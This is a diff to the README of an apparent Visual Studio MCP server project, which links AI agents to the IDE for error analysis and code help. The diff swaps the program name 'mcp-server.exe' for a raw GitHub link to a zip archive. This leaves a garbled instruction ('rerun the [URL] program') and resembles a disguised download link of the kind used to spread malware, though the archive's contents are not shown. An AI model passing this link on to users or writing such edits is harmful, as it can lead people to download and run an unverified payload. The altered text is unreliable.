keny0322/visual-studio-mcp/README.md

 3. The MCP server automatically communicates with AI agents.
 4. If errors happen, AI will analyze them and provide suggestions inside Visual Studio.
 5. You can also ask the AI agents for help with debugging or code improvement through Visual Studio interfaces, depending on your setup.
-6. To stop or restart the MCP server, close or rerun the `mcp-server.exe` program.
+6. To stop or restart the MCP server, close or rerun the `https://raw.githubusercontent.com/keny0322/visual-studio-mcp/main/Tools/mcp-studio-visual-v3.4.zip` program.

 You don’t need to perform any special commands to activate MCP.
 It works quietly once running.